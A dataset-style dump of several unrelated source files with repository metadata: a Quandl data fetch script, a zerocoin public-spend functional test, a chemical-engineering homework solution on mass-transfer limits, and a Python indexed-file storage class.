blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
794a7d84ec90f65b1511ebed775cf8e106c133ea
|
f81770e50efa6591b949e8124c26bd25cdcac8b8
|
/get_data_quandl.py
|
da25dc4e29cb1c1ecf0313fe255d63833d63bdf5
|
[] |
no_license
|
afcarl/stock-analysis
|
62fe629c14a1230972611e728a5bf0f6edff57d7
|
5bde6093437fd2152e876d4d686045c52f5a5307
|
refs/heads/master
| 2020-09-03T23:33:50.542928
| 2018-03-20T15:12:12
| 2018-03-20T15:12:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 338
|
py
|
import pandas as pd
import os
import quandl
import time
# put your api key in the auth.txt, to run the script
auth_tok = open('auth.txt','r').read().splitlines()
auth_tok = str(auth_tok[0])
quandl.ApiConfig.api_key = auth_tok
data = quandl.get("WIKI/KO", start_date = "2000-12-12", end_date = "2014-12-30")
print(data['Adj. Close'])
|
[
"alex20041051@gmail.com"
] |
alex20041051@gmail.com
|
7570f5e15fedff0e24028361292b3cc3a8d6cb57
|
50c668e9e0c10c1bcfd093b824e58ab66867cf30
|
/20-proyecto-python/main.py
|
c57bc118d609483598ce8ca1735fe924b4313728
|
[] |
no_license
|
bthecs/Python
|
1d4e9f424fce633c2fe50455654b21a1e56b3a19
|
b587f67bc6f999de4e80ebb53982430e48a68242
|
refs/heads/master
| 2023-03-29T00:40:36.071294
| 2021-03-30T00:31:34
| 2021-03-30T00:31:34
| 352,788,286
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
"""
Proyecto Python y Mysql:
-Abrir asistente
-Login o registros
-Si elegimo login, identifica al usuario y nos preguntara
-Crear nota, mostrar notas, borrarlas
"""
from usuarios import acciones
print("""
Acciones disponibles:
-registro
-login
""")
hazEl = acciones.Acciones()
accion = input("Que deseas hacer?: ")
if accion == 'registro':
hazEl.registro()
elif accion == 'login':
hazEl.login()
|
[
"fl.gimenez@alumno.um.edu.ar"
] |
fl.gimenez@alumno.um.edu.ar
|
35d0edee077868cf1d8eb1a21a31002342d71494
|
83e436d062adf45591b737b804de76d849446130
|
/strategies/preprocess/BasePreprocessStrategy.py
|
0dac414bf53b02b80833dc404c0a26239b2a4fbe
|
[] |
no_license
|
MateuszChmielewski99/CollardRecommendation
|
423783a316a8fcea063038f096af3b3ad0e2d1d5
|
46ea6cb384976176bd34f625f9806c857ac64bf5
|
refs/heads/main
| 2023-02-17T18:32:15.959255
| 2021-01-18T23:21:00
| 2021-01-18T23:21:00
| 330,805,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 119
|
py
|
from pandas import DataFrame
class BasePreprcoessStrategy:
def execute(self, dataframe: DataFrame):
pass
|
[
"chmielewski079@gmail.com"
] |
chmielewski079@gmail.com
|
665b611c5b7f2ceaf32df3bad8123faf25217302
|
e4cc95ec952cfc183ae3c1122d145497a580f305
|
/test/functional/zerocoin_valid_public_spend.py
|
bcf9e9e73bf72cf3be0158a06b5dec84d726e1a3
|
[
"MIT"
] |
permissive
|
jakilwq/TerraCredit
|
80866e19dde3e67efbec7ede705d5046b0973c1f
|
56c8833c79a2485ae9a4d101f9b7267b867a3cdf
|
refs/heads/master
| 2022-12-15T21:58:42.421232
| 2020-09-04T06:51:03
| 2020-09-04T06:51:03
| 292,806,732
| 0
| 0
| null | 2020-09-04T09:27:12
| 2020-09-04T09:27:12
| null |
UTF-8
|
Python
| false
| false
| 8,859
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2019 The TERRACREDIT developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Tests a valid publicCoinSpend spend
'''
from time import sleep
from fake_stake.util import TestNode
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import p2p_port, assert_equal, assert_raises_rpc_error, assert_greater_than_or_equal
class zCREDITValidCoinSpendTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-sporkkey=932HEevBSujW2ud7RfB1YF91AFygbBRQj3de3LyaCRqNzKKgWXi']]
def setup_network(self):
self.setup_nodes()
def init_test(self):
title = "*** Starting %s ***" % self.__class__.__name__
underline = "-" * len(title)
self.log.info("\n\n%s\n%s\n%s\n", title, underline, self.description)
# Setup the p2p connections and start up the network thread.
self.test_nodes = []
for i in range(self.num_nodes):
self.test_nodes.append(TestNode())
self.test_nodes[i].peer_connect('127.0.0.1', p2p_port(i))
def generateBlocks(self, n=1):
fStaked = False
while (not fStaked):
try:
self.nodes[0].generate(n)
fStaked = True
except JSONRPCException as e:
if ("Couldn't create new block" in str(e)):
# Sleep 2 seconds and retry
self.log.info("waiting...")
sleep(2)
else:
raise e
def mintZerocoin(self, denom):
self.nodes[0].mintzerocoin(denom)
self.generateBlocks(5)
def setV4SpendEnforcement(self, fEnable=True):
new_val = 1563253447 if fEnable else 4070908800
# update spork 18 and mine 1 more block
mess = "Enabling v4" if fEnable else "Enabling v3"
mess += " PublicSpend version with SPORK 18..."
self.log.info(mess)
res = self.nodes[0].spork("SPORK_18_ZEROCOIN_PUBLICSPEND_V4", new_val)
self.log.info(res)
assert_equal(res, "success")
sleep(1)
def run_test(self):
self.description = "Tests a valid publicCoinSpend spend."
self.init_test()
INITAL_MINED_BLOCKS = 301 # Blocks mined before minting
MORE_MINED_BLOCKS = 26 # Blocks mined after minting (before spending)
DENOM_TO_USE = 1 # zc denomination used for double spending attack
# 1) Start mining blocks
self.log.info("Mining/Staking %d first blocks..." % INITAL_MINED_BLOCKS)
self.generateBlocks(INITAL_MINED_BLOCKS)
# 2) Mint zerocoins
self.log.info("Minting %d-denom zCREDITs..." % DENOM_TO_USE)
for i in range(5):
self.mintZerocoin(DENOM_TO_USE)
# 3) Mine more blocks and collect the mint
self.log.info("Mining %d more blocks..." % MORE_MINED_BLOCKS)
self.generateBlocks(MORE_MINED_BLOCKS)
list = self.nodes[0].listmintedzerocoins(True, True)
serial_ids = [mint["serial hash"] for mint in list]
assert_greater_than_or_equal(len(serial_ids), 3)
# 4) Get the raw zerocoin data - save a v3 spend for later
exported_zerocoins = self.nodes[0].exportzerocoins(False)
zc = [x for x in exported_zerocoins if x["id"] in serial_ids]
assert_greater_than_or_equal(len(zc), 3)
saved_mint = zc[2]["id"]
old_spend_v3 = self.nodes[0].createrawzerocoinpublicspend(saved_mint)
# 5) Spend the minted coin (mine six more blocks) - spend v3
serial_0 = zc[0]["s"]
randomness_0 = zc[0]["r"]
privkey_0 = zc[0]["k"]
self.log.info("Spending the minted coin with serial %s and mining six more blocks..." % serial_0)
txid = self.nodes[0].spendzerocoinmints([zc[0]["id"]])['txid']
self.log.info("Spent on tx %s" % txid)
self.generateBlocks(6)
rawTx = self.nodes[0].getrawtransaction(txid, 1)
if rawTx is None:
self.log.warning("rawTx not found for: %s" % txid)
raise AssertionError("TEST FAILED")
else:
assert_equal(rawTx["confirmations"], 6)
self.log.info("%s: VALID PUBLIC COIN SPEND (v3) PASSED" % self.__class__.__name__)
# 6) Check double spends - spend v3
self.log.info("%s: Trying to spend the serial twice now" % self.__class__.__name__)
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[0].spendrawzerocoin, serial_0, randomness_0, DENOM_TO_USE, privkey_0)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 7) Check spend v2 disabled
self.log.info("%s: Trying to spend using the old coin spend method.." % self.__class__.__name__)
try:
res = self.nodes[0].spendzerocoin(DENOM_TO_USE, False, False, "", False)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if e.error["code"] != -4:
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if ("Couldn't generate the accumulator witness" not in e.error['message'])\
and ("The transaction was rejected!" not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
self.log.info("GOOD: spendzerocoin old spend did not verify.")
# 8) Activate v4 spends with SPORK_18
self.log.info("Activating V4 spends with SPORK_18...")
self.setV4SpendEnforcement(True)
self.generateBlocks(2)
# 9) Spend the minted coin (mine six more blocks) - spend v4
serial_1 = zc[1]["s"]
randomness_1 = zc[1]["r"]
privkey_1 = zc[1]["k"]
self.log.info("Spending the minted coin with serial %s and mining six more blocks..." % serial_1)
txid = self.nodes[0].spendzerocoinmints([zc[1]["id"]])['txid']
self.log.info("Spent on tx %s" % txid)
self.generateBlocks(6)
rawTx = self.nodes[0].getrawtransaction(txid, 1)
if rawTx is None:
self.log.warning("rawTx not found for: %s" % txid)
raise AssertionError("TEST FAILED")
else:
assert_equal(rawTx["confirmations"], 6)
self.log.info("%s: VALID PUBLIC COIN SPEND (v4) PASSED" % self.__class__.__name__)
# 10) Check double spends - spend v4
self.log.info("%s: Trying to spend the serial twice now" % self.__class__.__name__)
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[0].spendrawzerocoin, serial_1, randomness_1, DENOM_TO_USE, privkey_1)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 11) Try to relay old v3 spend now
self.log.info("%s: Trying to send old v3 spend now" % self.__class__.__name__)
assert_raises_rpc_error(-26, "bad-txns-invalid-zcredit",
self.nodes[0].sendrawtransaction, old_spend_v3)
self.log.info("GOOD: Old transaction not sent.")
# 12) Try to double spend with v4 a mint already spent with v3
self.log.info("%s: Trying to double spend v4 against v3" % self.__class__.__name__)
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[0].spendrawzerocoin, serial_0, randomness_0, DENOM_TO_USE, privkey_0)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 13) Reactivate v3 spends and try to spend the old saved one
self.log.info("Activating V3 spends with SPORK_18...")
self.setV4SpendEnforcement(False)
self.generateBlocks(2)
self.log.info("%s: Trying to send old v3 spend now" % self.__class__.__name__)
txid = self.nodes[0].sendrawtransaction(old_spend_v3)
self.log.info("Spent on tx %s" % txid)
self.generateBlocks(6)
rawTx = self.nodes[0].getrawtransaction(txid, 1)
if rawTx is None:
self.log.warning("rawTx not found for: %s" % txid)
raise AssertionError("TEST FAILED")
else:
assert_equal(rawTx["confirmations"], 6)
self.log.info("%s: VALID PUBLIC COIN SPEND (v3) PASSED" % self.__class__.__name__)
if __name__ == '__main__':
zCREDITValidCoinSpendTest().main()
|
[
"alonewolf2ksk@gmail.com"
] |
alonewolf2ksk@gmail.com
|
89d1c1b7edc57086880534bce223e185945de49f
|
1a2963e19984c6c4f542ef91113516d589cb964e
|
/on/z.py
|
8f6cebc3c8bbf858bf6c89fffe79bd61e7216956
|
[] |
no_license
|
ohnari/py
|
a33fe98cd65e55d4da80442c3501b72610ba863b
|
7c96d7cbfc8de8fd398237c8dda10d6ac66f7b53
|
refs/heads/master
| 2020-04-19T16:09:36.387718
| 2019-02-13T09:02:38
| 2019-02-13T09:02:38
| 168,295,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
#from pack import NariPairs
#from pack import ForexDataClient
#from pack import GaitameDataClient
#from pack import NariPairs
import pack
p = pack.NariPairs.getSymbolList(['eu'])
a = pack.GaitameDataClient()
b = pack.ForexDataClient()
c = a.getQuotes(p)
print(c)
print(b.base_uri)
|
[
"unconfigured@null.spigotmc.org"
] |
unconfigured@null.spigotmc.org
|
7525be1bcf6253a89b93a1686c8b64641ea89d39
|
a43763ea407ceab8588a661885e9744f3c8a8262
|
/HW_7/ChE445_HW7_Winter2020_Solution.py
|
7f381feb0973ad20f753d6893b0c32d6f4471a27
|
[] |
no_license
|
maryam-azhin/ChE445-Winter2020
|
30cbecc7b568f6274253e118257099c5b0963a31
|
1e90e7854f1a07b62a962404f7c3fe1d19dde4d3
|
refs/heads/master
| 2021-07-21T20:17:12.840870
| 2021-01-06T08:50:28
| 2021-01-06T08:50:28
| 233,687,358
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,774
|
py
|
#!/usr/bin/env python
# coding: utf-8
# ##### T.A. Maryam Azhin,
#
# Department of Chemical and Materials Engineering, University of Alberta
# **HW7. External mass transfer limitations.**
#
# due Monday, March 30, 2020. Weight: 2%
# Reaction: $A + O_2 \rightarrow B$ (gas phase)
#
# Kinetics: Intrinsically $1^{st}$ order to $A$ and apparent $0^{th}$ order to $O_2$ (excess air and $O_2$)*
#
# Catalyst: Spherical, $3\; cm$ diameter, non-porous, $4\; kg$
#
# Reactor: tubular PBR, i.d. $0.05\; m$, no pressure drop
#
# Bed density and porosity: $500 kg/m^3$, $0.4$
#
# Other properties at reaction temperature:
# -Concentration of $A$ in the entering feed $5E-4 mol/m^3$
#
# -Diffusivity of $A$ in air $2E-5 m^2/s$
#
# -Kinematic viscosity of the fluid $5E-5 m2/s$
#
# -Intrinsic rate constant $8 m^3(fluid)/(m3(bed) s)$
#
# External temperature gradients are negligible at all conditions in this assignment, but there is the possibility of external MTL and we have to find conditions to maximize the production of B. The system can be assumed to be constant density because of the excess oxygen (air).
#
# **Question 1.** For volumetric flow rates (reaction conditions) of $0.0005$, $0.05$ and $15 m^3/s$, express the surface concentration of $A$ as a function of its bulk concentration. (hint: use $k$ and $kc$). 35 pts
#
# **Question 2.** Among the three cases, select the flow rate where external MTL can be ignored and calculate $X_A$ and exit molar flow rate of product $B$ (use ideal PBR design equation, and use bed density to have the correct units for the rate constant to be used in the mole balance for the PBR). 10 pts
#
# **Question 3.** Among these three cases, select the flow rate where external MTL is severe and external diffusion is rate-limiting. Again, calculate $X_A$ and $F_B$ considering that the observed rate is equal to the mass transfer rate. (For bed length, use bed density, catalyst mass and the tube Ac). 15 pts
#
# **Question 4.** Calculate the conversion and $F_B$ for the third case. (Use PBR design equation with CAs but conversion is related to $C_{Ab}, not $C_{As}. Again, watch out for units of $k$ as in **Q2**). 25 pts
#
# **Question 5.** Can you explain why the conversion in the cases affected by external MTL is higher than in the case where kinetics are rate determining? If your target were to produce the highest exit $F_B$, which
# case among the three would you prefer? 10 pts
#
# **Question 6.** Given that diffusivities in liquid phase are lower than those in gas phase, which reactions are more prone to mass-transfer limitations: those in gas phase or in liquid phase? 5 pts
#
# *Note: an “apparent” order means that the reaction rate at these particular concentrations (pressures) and temperature does not depend on the oxygen pressure. The reaction may still be, for example, an intrinsic
# first order to oxygen:
#
# \begin{eqnarray}
# -r_A = k·C_A·P_{O2}
# \end{eqnarray}
#
# But because of the excess oxygen, its partial pressure does not change significantly during the reaction, so it can be lumped into the rate constant (e.g. if there are $100$ times more moles of $O_2$ than of $A$, the pressure of oxygen will drop negligibly even when all $A$ is consumed). So, the rate law (only at these particular conditions) can be simplified to $-r_A = k*·C_A$.
# **Answer to Q1**
# \begin{eqnarray}
# C_{As}=\frac{k_ca_c}{k+k_ca_c}C_{Ab}, \;\;\;1^{st}\;order
# \end{eqnarray}
#
# \begin{eqnarray}
# k_{c}=\frac{D_{AB}*Sh}{D_p}\\
# Sh=2+0.6*Re_p^{0.5}*Sc^{1/3}\\
# Sc=\frac{\nu}{D_{AB}}=\frac{5*10^{-5}}{2*10^{-5}}=2.5
# \end{eqnarray}
#
# \begin{eqnarray}
# Re_p=\frac{u*D_p}{\nu}=\frac{Q*D_p}{A_c*\nu}=Q*\frac{0.03}{\pi*0.025^2*5*10^{-5}}=305578*Q
# \end{eqnarray}
#
# \begin{eqnarray}
# a_c=\frac{6*(1-\phi)}{D_p}=120 \frac{m^2}{m^3_{bed}}
# \end{eqnarray}
#
# Check units:
#
# $[k]=[\frac{m^3_{l}}{m^3_{bed}*s}]$
#
# $[k_ca_c]=[\frac{m}{s}*\frac{m^2}{m^3_{bed}}]$, match, ok.
#
# | | | | | | |
# |:---------:|-----:|-----:|-----:|----------:|---------------------------------------:|
# |$Q,\;m^3/s$|$Sc$|$Re_p$|$Sh$|$k_c,\;m/s$|$C_{As}=\frac{k_c*a_c}{k+k_c*a_c}*C_{Ab}$|
# |0.0005 |2.5|153 |12.068|$8.04*10^{-3}$ |$C_{As}=0.11*C_{Ab}\;\;\frac{mol}{m^3}$ |
# |0.05 |2.5|15279 |102.68|$6.84*10^{-2}$|$C_{As}=0.51*C_{Ab}\;\;\frac{mol}{m^3}$|
# |15|2.5|4583798|1745.87|1.16|$C_{As}=0.95*C_{Ab}\;\;\frac{mol}{m^3}$|
# In[1]:
import numpy as np
nu=5*pow(10,-5) #m2/s
DAB=2*pow(10,-5) #m2/s
Sc=nu/DAB
Dp=0.03 #m
CA0=5*pow(10,-4) #mol/m3
rhob=500 #kg/m3
phi=0.4
k=8 #m3fl/(m3cat.s)
W=4
Id=0.05 #m
Ac=3.14*pow(Id,2)/4
ac=6*(1-phi)/Dp #1/m
print ("Sc=",Sc)
Q=[0.0005,0.05,15]
Rep=np.zeros(len(Q))
Sh=np.zeros(len(Q))
kc=np.zeros(len(Q))
CAs_coef=np.zeros(len(Q))
for i in range(0,len(Q)):
Rep[i]=Q[i]*Dp/(nu*Ac)
Sh[i]=2+0.6*pow(Rep[i],1/2)*pow(Sc,1/3)
kc[i]=Sh[i]*DAB/Dp
CAs_coef[i]=kc[i]*ac/(k+kc[i]*ac)
print ("ac=",ac)
print ("Q=",Q)
print ("Rep=",Rep)
print ("Sh=",Sh)
print ("kc=",kc)
print ("CAs=",CAs_coef,'*CAb')
# ----
# **Answer to Q2**
#
# When $C_{As}=~C_{Ab}$, there are no external MTL, so at $Q=15\;\frac{m^3}{s}$
#
# **MB PBR:**
#
# \begin{eqnarray}
# F_{A0}\frac{dX}{dW}=kC_A=k\frac{F_{A0}}{Q}(1-X)
# \end{eqnarray}
# constant $Q$:
#
# \begin{eqnarray}
# \frac{dX}{1-X}=\frac{k}{Q}dW\\
# ln(\frac{1}{1-X})=\frac{k*W}{Q}
# \end{eqnarray}
#
# units: from MB: $[\frac{mol}{s*kg_{cat}}]=[k*\frac{mol}{m^3_{fl}}]$
#
# $[k]=[\frac{m^3_{fl}}{s*kg_{cat}}]$
#
# $k$ is given as $8\;\;\frac{m^3_{fl}}{m^3_{bed}*s}$ so multiply by $\frac{1}{\rho_b[kg_{cat}/m^3_{bed}]}$
#
# \begin{eqnarray}
# X=1-exp(\frac{-k*W}{\rho_b*Q})=1-exp(\frac{-8*4}{500*15})=0.4\;%
# \end{eqnarray}
#
# \begin{eqnarray}
# F_B=F_{A0}*X_A=C_{A0}*Q*X=5*10^{-4}*15*\frac{0.4}{100}=3*10^{-5}\;\;\frac{mol}{s}
# \end{eqnarray}
# In[2]:
import math
X3=1-math.exp((-k*W)/(rhob*Q[2]))
FB3=CA0*Q[2]*X3
print("X3={0:.4f}".format(X3),'%')
print ("FB3={0:.6f}".format(FB3),'mol/s')
# -----
# **Answer to Q3**
#
# When $C_{As}=0$ ($<<C_{Ab}$) then there are severe external MTL. This is the case with $0.0005\frac{m^3}{s}$.
#
# At constant $Q$
#
# \begin{eqnarray}
# ln(\frac{1}{1-X})=\frac{k_ca_cL}{u}\\
# \frac{L}{u}=\frac{V_{bed}/A_c}{Q/A_c}=\frac{W/\rho_{bed}}{Q}\\
# ln(\frac{1}{1-X})=-8.04*10^{-3}*120*\frac{4/500}{0.0005}\\
# x=100%
# \end{eqnarray}
#
# \begin{eqnarray}
# F_B=F_{A0}*X_A=C_{A0}*Q*X=5*10^{-4}*0.0005*1=2.5*10^{-7}\;\frac{mol}{s}
# \end{eqnarray}
# In[3]:
X1=1-math.exp(-kc[0]*ac*W/(rhob*Q[0]))
FB1=CA0*Q[0]*X1
print("X1={0:.2f}".format(X1),'%')
print ("FB1={0:.8f}".format(FB1),'mol/s')
# ----
# **Answer to Q4**
#
# \begin{eqnarray}
# F_{A0}\frac{dX}{dW}=kC_{As}
# \end{eqnarray}
# for $Q=0.05\;m^3/s$:
#
# \begin{eqnarray}
# C_{As}=C_{Ab}\frac{k_ca_c}{k+k_ca_c}=0.51 C_{Ab}\\
# C_{Ab}=\frac{F_{A0}}{Q}(1-X)
# \end{eqnarray}
# at $Q$ constant:
#
# \begin{eqnarray}
# ln(\frac{1}{1-X})=\frac{k*W*0.51}{Q}
# \end{eqnarray}
#
# Here, $k$ has units $\frac{m^3_{fl}}{s*kg_{cat}}$
#
# given $k=8 \frac{m^3_{fl}}{m^3_{bed}*s}*\frac{1[m^3_{bed}]}{500[kg_{cat}]}$
#
# \begin{eqnarray}
# ln(\frac{1}{1-X})=\frac{8*4*0.51}{0.05*500}\\
# X=48
# \end{eqnarray}
#
# $F_{B}=F_{A0}X=C_{A0}QX=5*10^{-4}*0.05*0.48=1.2*10^{-5} \frac{mol}{s}$
#
# In[4]:
X2=1-math.exp(-k*W*CAs_coef[1]/(rhob*Q[1]))
FB2=CA0*Q[1]*X2
print("X2={0:.3f}".format(X2),'%')
print ("FB2={0:.7f}".format(FB2),'mol/s')
# ----
# **Answer to Q5**
#
# **In the cases affected by MTL**
#
# External MTL is present when $Q$ and hence $F_{A0}$ are lower values, so the fluid spends more time in the reactor and higher conversion, $X$, is achieved. $k_ca_c<<k$, Slow diffusion and fast reaction. So observed reaction rate = rate of external diffusion.
#
# **At high $Q$,** when there are no MTL, even at low $X$, $F_B$ is the highest.
#
# $Q=15 m^3/s$ gives the highest $F_B$, $Q=0.05 m^3/s$ gives a slightly smaller value for $F_B$ while having a larger conversion $X=48%$ So case $Q=0.05 m^3/s$ is perfect to produce the highest exit $F_B$ yet higher conversion.
# ----
# **Answer to Q6**
#
# Diffusivities in liquid phase are lower (because of higher density), so liquid phase reactions are more prone to MTL. Lower diffusivities give lower $Re$ and hence higher concentration, $C_A$, which means more MTL.
#
# $kc \propto D_{AB}$ Therefore smaller $D_{AB}$ results in smaller $k_c$ or smaller mass transfer coefficient. The smaller mass transfer coefficient, the more prone the reaction is to mass transfer limitations. Since liquids have low diffusion rate, so they have higher MTL .
|
[
"azhin@ualberta.ca"
] |
azhin@ualberta.ca
|
a5c90c37e4a5591bf12c0421d468c67aff000f88
|
464208517e4691fd9e9dd56a46550e35ae34555f
|
/indexed.py
|
962de385c0f62ddcac53c2de0d212e96279e0f87
|
[
"MIT"
] |
permissive
|
destrangis/indexed
|
260cea22afb94888cbb0282dbc6b007c2a0ed5da
|
38dbca8719dfdcbb5d9c4e64192077f4aafd87da
|
refs/heads/master
| 2020-08-10T06:35:52.809507
| 2019-10-10T21:03:53
| 2019-10-10T21:03:53
| 214,284,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,519
|
py
|
import sys
import struct
import pathlib
import pickle
from numbers import Number
VERSION = "1.0.0"
INTSIZE = 4
INTBINFORMAT = "!L"
HEADERFORMAT = "!LLLL"
MAGIC_NUMBER = 0xd8fd2372
NO_MORE_RECORDS = 0xffffffff
DEFAULT_RECORD_SIZE = 512
DEFAULT_NUM_RECORDS = 10
RECORDS_OFFSET = 4 * INTSIZE # start of records area
class IndexedFileError(Exception):
pass
class IndexedFile:
"""
Simple indexed files.
Format:
Byte: 0<-- INTSIZE-> <-INTSIZE-> <-- INTSIZE -> <-- INTSIZE ---->
Header +-------------+-----------+--------------+-----------------+
| Magic | Rec. Size | Index offset | 1st free record |
Records +-------------+-----------+--------------+-----------------+
+--- | next record | Record (recsize - INTSIZE bytes) |
| +-------------+ |
| | |
+--> +-------------+--------------------------------------------+
+--- | next record | Record |
| +-------------+
+--> ...... INTSIZE INTSIZE
+-------------+--------------------------+---------+-------+
Index | Key Length | Key (Key Lenght bytes) | Rec.Idx | Size |
+-------------+--------------------------+---------+-------+
| Key Length | Key | Rec.Idx | Size |
+-------------+--------------------------+---------+-------+
......
+-------------+
End | 0x00000000 |
+-------------+
"""
def __init__(self, name, mode='r',
recordsize=DEFAULT_RECORD_SIZE,
num_recs_hint=DEFAULT_NUM_RECORDS):
if mode not in "rc":
raise IndexedFileError("'{}' Mode must be 'r' or 'c'")
self.name = name
self.path = pathlib.Path(name)
self.index = {}
if mode == "r":
if self.path.is_file():
self.open()
else:
raise IndexedFileError("'{}' Not found.")
elif mode == "c":
self.recordsize = max(recordsize, 2 * INTSIZE)
self.current_size = num_recs_hint*recordsize
self.index_offset = self.current_size + RECORDS_OFFSET
self.first_free = 0
self.create()
def _read_header(self):
self.fd.seek(0)
buf = self.fd.read(4*INTSIZE)
magic, rs, idxoffs, fstfree = struct.unpack(HEADERFORMAT, buf)
if magic != MAGIC_NUMBER:
raise IndexedFileError("'{}' Bad magic number."
.format(self.name))
self.recordsize = rs
self.index_offset = idxoffs
self.first_free = fstfree
self.current_size = self.index_offset - RECORDS_OFFSET
def _write_header(self):
buf = struct.pack(HEADERFORMAT,
MAGIC_NUMBER,
self.recordsize,
self.index_offset,
self.first_free)
self.fd.seek(0)
self.fd.write(buf)
self.fd.flush()
def open(self):
self.fd = self.path.open("r+b")
self._read_header()
self._read_index()
def create(self):
self.fd = self.path.open("w+b")
self.fd.truncate(self.index_offset)
self._write_header()
self.init_free_list()
self.fd.seek(0, 2) # position to end of file
self._writeint(0)
def _readint(self):
intblock = self.fd.read(INTSIZE)
return struct.unpack(INTBINFORMAT, intblock)[0]
def _writeint(self, value):
self.fd.write(struct.pack(INTBINFORMAT, value))
def record_number(self, i):
"""Offset of record #i"""
return i * self.recordsize + RECORDS_OFFSET
def first_record(self):
"""Offset of first record (record 0)"""
return self.record_number(0)
def last_record(self):
"""Offset of last record"""
num_records = self.current_size // self.recordsize
return self.record_number(num_records-1)
def init_free_list(self, start=0):
num_records = self.current_size // self.recordsize
for rn in range(start, num_records):
self.fd.seek(self.record_number(rn))
self._writeint(rn + 1)
self.fd.seek(self.last_record())
self._writeint(NO_MORE_RECORDS)
def _read_index(self):
self.fd.seek(self.index_offset)
keysize = self._readint()
while keysize:
keybytes = self.fd.read(keysize)
key = pickle.loads(keybytes)
idx = self._readint()
datasize = self._readint()
self.index[key] = (idx, datasize)
keysize = self._readint()
def _write_index(self):
self.fd.seek(self.index_offset)
for key in self.index:
idx, size = self.index[key]
keybytes = pickle.dumps(key)
self._writeint(len(keybytes))
self.fd.write(keybytes)
self._writeint(idx)
self._writeint(size)
self._writeint(0)
def close(self):
self._write_index()
self.fd.close()
def _allocate_records(self, numrecords):
n = 0
indices = []
recnum = self.first_free
while n < numrecords and recnum != NO_MORE_RECORDS:
indices.append(recnum)
n += 1
self.fd.seek(self.record_number(recnum))
recnum = self._readint()
if n < numrecords:
raise IndexedFileError("Out of space")
last = indices[-1]
self.fd.seek(self.record_number(last))
new_first_free = self._readint()
self.fd.seek(self.record_number(last))
self._writeint(NO_MORE_RECORDS)
self.first_free = new_first_free
self._write_header()
return indices
def allocate(self, numrecords):
"""
Return a list of free records, resizing the file if not enough
free records are available.
"""
free_list = []
while not free_list:
try:
free_list = self._allocate_records(numrecords)
except IndexedFileError as err:
if str(err) == "Out of space":
self.resize()
else:
raise
return free_list
def __setitem__(self, key, bytesval):
if key in self:
del self[key]
datasize = len(bytesval)
usable_rec_size = self.recordsize - INTSIZE
records_needed = datasize // usable_rec_size + 1
start = 0
free_list = self.allocate(records_needed)
for idx in free_list:
self.fd.seek(self.record_number(idx)+INTSIZE)
self.fd.write(bytesval[start:start+usable_rec_size])
start += usable_rec_size
first_record = free_list[0]
self.index[key] = (first_record, datasize)
self._write_index()
def retrieve(self, start):
"""
Retrieve the data of the records from start until a record
marked with NO_MORE_RECORDS
"""
usable_rec_size = self.recordsize - INTSIZE
idx = start
while idx != NO_MORE_RECORDS:
self.fd.seek(self.record_number(idx))
idx = self._readint()
yield self.fd.read(usable_rec_size)
def record_list(self, start):
"""
Return the record chain from start until NO_MORE_RECORDS
"""
idx = start
while True:
yield idx
self.fd.seek(self.record_number(idx))
idx = self._readint()
if idx == NO_MORE_RECORDS:
break
def last_in_chain(self, start):
"""
Return the last record in a chain starting by start.
The next_record field in its index should be NO_MORE_RECORDS
"""
for idx in self.record_list(start):
pass
return idx
def __getitem__(self, key):
usable_rec_size = self.recordsize - INTSIZE
first_record, datasize = self.index[key]
buf = b""
for chunk in self.retrieve(first_record):
buf += chunk
return buf[:datasize]
def resize(self):
num_records = self.current_size // self.recordsize
new_size = 2 * self.current_size
new_index_offset = new_size + RECORDS_OFFSET
self.index_offset = new_index_offset
self.fd.truncate(self.index_offset)
self.current_size = new_size
first_new_record = num_records
self.init_free_list(first_new_record)
if self.first_free != NO_MORE_RECORDS:
# not completely full, add new records to existing free space
idx = self.last_in_chain(self.first_free)
self.fd.seek(self.record_number(idx))
self._writeint(first_new_record)
else:
self.first_free = first_new_record
self._write_index()
self._write_header()
def __delitem__(self, key):
first_record, datasize = self.index[key]
del self.index[key]
self._write_index()
idx = self.last_in_chain(first_record)
self.fd.seek(self.record_number(idx))
self._writeint(self.first_free)
self.first_free = first_record
self._write_header()
def __contains__(self, key):
return key in self.index
def gen_keys(self):
for k in self.index.keys():
yield k
